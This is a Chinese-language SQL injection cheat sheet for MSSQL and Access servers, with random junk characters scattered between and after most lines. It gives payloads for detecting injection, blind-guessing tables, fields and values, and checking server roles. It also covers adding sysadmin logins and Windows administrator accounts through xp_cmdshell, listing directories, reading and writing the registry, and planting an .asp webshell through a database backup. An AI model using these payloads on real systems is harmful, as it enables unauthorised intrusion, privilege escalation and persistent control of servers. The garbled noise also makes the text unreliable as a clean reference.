1.判断是否有注入;and 1=1 ;and 1=2 iZ^tLnc
2.初步判断是否是mssql ;and user>0 -k4w$0)
R]LRgfi9
3.注入参数是字符'and [查询条件] and ''=' 5ov F$qn
WNO|ziy
4.搜索时没过滤参数的'and [查询条件] and '%25'=' vS@;D7ep
9A7LDHst7
5.判断数据库系统 *h <_gn
eNQQ`ll@m
;and (select count(*) from sysobjects)>0 mssql ~g#$'dS
Fj_6jsDb
;and (select count(*) from msysobjects)>0 access )U2cS\k'7n
K@RE-K6{
%oee x1`=
26e. Hu
6.猜数据库 ;and (select Count(*) from [数据库名])>0 J*!_kg)>J
7I#<w[l>k
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 aa-{,X"MF
$u ae8h
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 >e'Hz (~'/
5.IX
9.(1)猜字段的ascii值(access) >TKl`O
tz6N,4J?
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 B.Szp_$
l?f%2:}m
(2)猜字段的ascii值(mssql) zUQn*Cio e
iNlY\67sW
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 2#i*'.
4\#b@1]}
10.测试权限结构(mssql) EC:u;2f!
p%ve1>c
VR'R7
'5f6
M^}|2
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 7o99@K,
N=vb*3ECg
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 4qYT
U8>M`e"D
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ?z[k.l+6w
s7 789pR
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- K6z)&<
h1_9Xp~N
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- D#.N)@\
|/YwMBi
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- iXgy/>qgT
e`7dRnx&0
;and 1=(select IS_MEMBER('db_owner'));-- crDm2oA~t
J#/L}h;qH
rL KwuZ
KAFx^JLo
11.添加mssql和系统的帐户 :TZ</3Sw
dlf nhf
;exec master.dbo.sp_addlogin username;-- 17C"@1n-
;exec master.dbo.sp_password null,username,password;-- ;_nV*G.y#^
=/Lwprj
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- L>ruNw'-K
#~JR_oQE!
;exec master.dbo.xp_cmdshell 'net user username password <@](uWu
\F; S
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 5bZjW~d
&tjv.t
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 4b@Awtk
Qt~QJJN?oF
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- tK0Ksnl^
'CfM'f3uu
`pJWZ:3
Py!
F
12.(1)遍历目录 gm1 7VrC
N
t-8[J
;create table dirs(paths varchar(100), id int) !A|ayYBb\
%&81xAt
;insert dirs exec master.dbo.xp_dirtree 'c:\' 4e!>A
M3EB=tU
;and (select top 1 paths from dirs)>0 Z37%jdr
!xRboPg
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) S [=l/3c
9x]yu6
a*N<gId
S O#R5Mu2N
(2)遍历目录 R)Y*<Na
:9.QhY)D
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- vK7J;U+cJ
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 scZSnCrR
|%tI!RN):
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 bpaS(nBy
7,!$lT#
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 x 3C^ S~
|EpL~G_
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 V.?Oly
RHj<t");
&f"kWOe$X
rP<S
=eb
13.mssql中的存储过程 Eo@b)h
CW .
O"_
xp_regenumvalues 注册表根键, 子键 79y'PFSms
b'mp$lt!
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 uupfL>h
wQR0R~|M
xp_regread 根键,子键,键值名 #*v:.0%
[7+dZL[
;exec xp_regread SQhw |QdG
WvVf+|Km
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 Eq82?+9
\*r]v;NcP
xp_regwrite 根键,子键, 值名, 值类型, 值 Y5XhV;16
'"4S3Fysm
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ^1jZwP;5eW
i4g99Kvl
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 k4!z;Yq
S>N/K
xp_regdeletevalue 根键,子键,值名 y7LT;`A
f{j.jfl\x
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 zjlo3=FQX[
.G/2CVMj
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 T!3_Q/~^r
`ZLA=oD
;z3w#fNMv
tEC`->|
14.mssql的backup创建webshell Xt%>XP
enw7?| (
use model 3w!,@=.q
B Sc5@;
create table cmd(str image); 8^U+P%
863PVce",}
insert into cmd(str) values (''); =zXA0%
I7@g,~s
backup database model to disk='c:\l.asp'; kM o7mkV
meM61ue_2
laX67Vjv
m@#@7[6]o
15.mssql内置函数 |h{#r7H0
9+"\7MHw
;and (select @@version)>0 获得Windows的版本号 U|YIu!^
W%&'EJ)62
;and user_name()='dbo' 判断当前系统的连接用户是不是sa zZ})$Ny(
!-<PV
;and (select user_name())>0 爆当前系统的连接用户 !^*-]p/z
WY`hNT6M
;and (select db_name())>0 得到当前连接的数据库 -'F? |
$9In\x
cpe/GvD5]
%$3)xtS6
16.简洁的webshell `GQ'yv
Qf<@
:T*
use model vb1Gz]~)>
[;*Vm0>t
create table cmd(str image); =j$!N# L
%Tvy|L
,
insert into cmd(str) values (''); ET:B"
Q?7:XbN
backup database model to disk='g:\wwwtest\l.asp';